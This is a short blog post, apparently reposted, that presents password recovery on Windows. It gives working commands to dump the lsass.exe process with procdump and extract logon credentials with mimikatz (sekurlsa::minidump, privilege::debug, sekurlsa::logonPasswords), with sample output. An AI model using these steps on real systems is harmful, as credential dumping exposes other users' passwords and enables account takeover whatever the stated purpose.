from–https://michlstechblog.info/blog/windows-recover-lost-passwords-from-memory/
Hi,
if a User is logged on and forget it’s password you can dump to lsa process and recover the password from a dump file.
Two tools are needed:
- Microsoft’s sysinternals procdump
- mimikatz. A tool to play with windows security. Take care when download precompiled binaries. Better get the source code from github and compile it yourself. Its very easy
Lets start. Login as a User with administrator permissions and dump the lsass process
C:\>procdump.exe -accepteula -ma lsass.exe %TEMP%\lsass.dmp
ProcDump v7.1 - Writes process dump files
Copyright (C) 2009-2014 Mark Russinovich
Sysinternals - www.sysinternals.com
With contributions from Andrew Richards[09:53:48] Dump 1 initiated: C:\Users\user\AppData\Local\Temp\lsass.dmp
[09:53:55] Dump 1 writing: Estimated dump file size is 42 MB.
[09:53:55] Dump 1 complete: 42 MB written in 7.5 seconds
[09:53:56] Dump count reached.
Recover the lost information. Start mimikatz interactive shell
C:\> mimikatz.exe
To Get help type double :: respectively for a module sekurlsa::
Open dmp file
mimikatz # sekurlsa::minidump C:\Users\user\AppData\Local\Temp\lsass.dmp
Switch to MINIDUMP : 'C:\Users\user\AppData\Local\Temp\lsass.dmp'
And get the lost information
mimikatz # sekurlsa::logonPasswords
Mimikatz also supports Windows full- and crashdumps and VMware vmem as input. To extract it from a memory dump or a hibernation file use the mimikatz offline plugin for volatility.
It’ s also possible to recover the login credentials directly from the lsass process. This is the default.
You have to get debug privileges to do this otherwise a ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) occurs and also mimikatz.exe must be compiled for the used OS Version (x86 or x64, Error: ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations)
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonPasswords
CAUTION: Be very carefully be when using this tool, because you can make visible extreme sensitive data!!! Maybe in your work or country this tool is classified as hacker tool!!!
Michael